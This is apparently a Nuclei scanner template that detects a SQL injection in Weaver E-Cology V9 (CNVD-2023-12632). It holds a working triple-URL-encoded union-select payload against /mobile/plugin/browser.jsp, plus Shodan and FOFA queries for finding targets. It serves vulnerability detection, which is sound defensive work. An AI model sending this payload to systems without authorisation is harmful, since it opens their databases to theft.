id: CNVD-2023-12632

info:
  name: E-Cology V9 - SQL Injection
  author: daffainfo
  severity: high
  description: |
    Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'ecology_JSessionid'
    fofa-query: app="泛微-协同商务系统"
  tags: cnvd,cnvd2023,ecology,sqli

# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times
http:
  - raw:
      - |
        POST /mobile/plugin/browser.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '283f42764da6dba2522412916b031080'
          - '"autoCount"'
          - '"autoGet"'
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ac8d7d77e7fc71d72ed50693564d11a326afd1e25d223a0089bea19f7f2776370220530d4c64341f3cb397f5a7765569d5d626dbf4a0b8d114ef8c9ad1af078f1061:922c64590222798bb761d5b6d8e72950